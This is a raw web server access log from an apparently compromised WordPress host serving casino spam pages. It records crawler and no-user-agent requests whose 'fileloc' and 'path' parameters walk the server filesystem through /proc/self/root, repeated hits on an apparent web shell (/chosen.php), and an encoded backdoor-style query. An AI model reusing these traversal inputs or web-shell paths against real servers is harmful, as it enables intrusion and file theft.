216.73.216.11 - - [01/Nov/2025:08:35:08 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fja.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:08 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclike%2Fclike.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclike HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcss%2Fscss.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcss HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclike%2Fscala.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclike HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.134.206 - - [01/Nov/2025:08:35:07 -0400] "GET /slot-spirit-of-adventure-by-pragmatic-play-demo-free-play?fileloc=/home/creaqbdc/.cagefs/tmp/phpDdw5D2&path=/home/creaqbdc/.cagefs/tmp HTTP/1.1" 200 64393 "https://creativefinishings.com/slot-spirit-of-adventure-by-pragmatic-play-demo-free-play?path=/home/creaqbdc/.cagefs/tmp" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.11 - - [01/Nov/2025:08:35:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjinja2%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fjinja2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:07 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Ftr.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 3078 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fdtd%2Fdtd.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fdtd HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:09 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftcl%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ftcl HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:09 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fbrainfuck%2Fbrainfuck.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fbrainfuck HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fgfm%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fgfm HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.212.86.97 - - [01/Nov/2025:08:35:08 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?fileloc=//opt/cloudlinux/alt-php81/root/usr/lib64/php/modules/xdiff.so&path=//opt/cloudlinux/alt-php81/root/usr/lib64/php/modules HTTP/1.1" 200 3043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:35:10 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhtmlmixed%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhtmlmixed HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:07 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fntriples%2Fntriples.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fntriples HTTP/1.1" 200 4144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcss%2Fless.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcss HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.59 - - [01/Nov/2025:08:35:10 -0400] "GET /q-~243GiXRm57uY6jOoQglGmPCiRhmIsJsKn9720/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss%2Findex.css&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fdashboard%2Fscss HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.223 - - [01/Nov/2025:08:35:10 -0400] "GET /?path=//proc/self/root/proc/2970079/root/lib/sysusers.d HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmumps%2Fmumps.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmumps HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:10 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fko.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ffcl%2Ffcl.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Ffcl HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:10 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl%2Fmbfl_convert.h&path=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:11 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmarkdown%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fmarkdown HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fapl%2Fapl.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fapl HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhaskell-literate%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fhaskell-literate HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclike%2Ftest.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fclike HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:11 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2F_templates.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fq%2Fq.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fq HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fstylus%2Fstylus.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fstylus HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fen.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp%2Fcs.html.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fjs%2Fi18n%2Fhelp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:11 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
23.23.180.225 - - [01/Nov/2025:08:35:12 -0400] "GET /freispiele-blos-einzahlung2025-beste-freespins-kostenfrei/?fileloc=//opt/alt/php55/usr/include/php/ext/standard/php_fopen_wrappers.h&path=//opt/alt/php55/usr/include/php/ext/standard HTTP/1.1" 500 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:35:12 -0400] "GET /items/1423551308.htm HTTP/1.1" 200 18757 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:35:12 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fasn.1%2Fasn.1.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fasn.1 HTTP/1.1" 200 5303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:12 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcrystal%2Fcrystal.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fcrystal HTTP/1.1" 200 5649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:11 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpuppet%2Findex.html&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fpuppet HTTP/1.1" 200 3782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:12 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fnsis%2Fnsis.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Fnsis HTTP/1.1" 200 5888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.11 - - [01/Nov/2025:08:35:12 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Foz%2Foz.js&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fwp-file-manager%2Flib%2Fcodemirror%2Fmode%2Foz HTTP/1.1" 200 4806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [01/Nov/2025:08:35:12 -0400] "GET /q-~45DEdUjXeRIqtyGVeAQO4G6U8JjigiOC37370/ HTTP/1.1" 200 18381 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.11 - - [01/Nov/2025:08:35:12 -0400] "GET /online-french-roulette-classic-uk?fileloc=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss%2Fstyle.scss&path=%2F%2Fproc%2Fself%2Fcwd%2Fwp-content%2Fplugins%2Fessential-blocks%2Fsrc%2Fadmin%2Fquick-setup%2Fscss HTTP/1.1" 200 2737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
36.85.79.74 - - [01/Nov/2025:08:35:12 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
216.73.216.11 - - [01/Nov/2025:08:35:12 -0400] "GET /avenger-slots-casino-no-deposit-bonus-100-free-spins?fileloc=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl%2Fmbfl_defs.h&path=%2F%2Fopt%2Falt%2Fphp72%2Fusr%2Finclude%2Fphp%2Fext%2Fmbstring%2Flibmbfl%2Fmbfl HTTP/1.1" 200 3288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
199.188.200.18 - - [01/Nov/2025:08:30:16 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030333831362p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303231362q6236363739653637616637366139646464623930636162633732346464666533222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
54.235.125.129 - - [01/Nov/2025:08:35:15 -0400] "GET /a-journey-through-timeless-realms-in-crash-x-game/?path=//opt/cloudlinux/venv/lib/python3.11/site-packages/pyflakes/test/__pycache__ HTTP/1.1" 200 4112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:35:13 -0400] "GET /q-~137xgaFDmmeXSDBpPlkZn1gGdhf52Pmrw6642/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:16 -0400] "GET /chosen.php HTTP/1.1" 200 71006 "-" "-"
74.7.227.223 - - [01/Nov/2025:08:35:17 -0400] "GET /?fileloc=//proc/self/root/proc/2966092/root/lib/firmware/rtl_nic/rtl8127a-1.fw&path=//proc/self/root/proc/2966092/root/lib/firmware/rtl_nic HTTP/1.1" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:18 -0400] "GET /chosen.php HTTP/1.1" 200 70993 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:35:20 -0400] "GET /items/1423726910.htm HTTP/1.1" 200 20187 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.197 - - [01/Nov/2025:08:35:20 -0400] "GET /m248029848?srsltid=AfmBOoudoOOxzYKwI0gkkx_kWqqh60adU_ILLTD5FG-W-SCFaWG7ym HTTP/1.1" 200 18355 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
50.16.216.166 - - [01/Nov/2025:08:35:20 -0400] "GET /beste-versorger-provision/?fileloc=//opt/cloudlinux/alt-php80/root/usr/lib64/php/modules/sqlsrv.so&path=//opt/cloudlinux/alt-php80/root/usr/lib64/php/modules HTTP/1.1" 200 3043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
36.85.79.74 - - [01/Nov/2025:08:35:20 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
40.77.167.8 - - [01/Nov/2025:08:35:21 -0400] "GET /items/904124586.htm HTTP/1.1" 200 18784 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:35:20 -0400] "GET /q-~146gWObOLIxDUtTbyrB6fdGqRW9fKwibS45729/ HTTP/1.1" 200 4158 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:22 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
36.85.79.74 - - [01/Nov/2025:08:35:24 -0400] "GET /chosen.php HTTP/1.1" 500 0 "-" "-"
107.20.181.148 - - [01/Nov/2025:08:35:24 -0400] "GET /beste-versorger-provision/?path=//proc/self/root/home/creaqbdc/www/wp-includes/sodium_compat/namespaced HTTP/1.1" 200 3642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:35:24 -0400] "GET /items/1424023850.htm HTTP/1.1" 200 18669 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.85.79.74 - - [01/Nov/2025:08:35:24 -0400] "GET /chosen.php HTTP/1.1" 200 70990 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:35:25 -0400] "GET /q-~163zlzjFXhRwvODbwRepb3Xn5zfkKTyht43802/ HTTP/1.1" 200 4149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.223 - - [01/Nov/2025:08:35:25 -0400] "GET /?path=//proc/self/root/proc/2970079/root/lib/debug/sbin HTTP/1.1" 200 2551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:27 -0400] "GET /chosen.php HTTP/1.1" 200 70997 "-" "-"
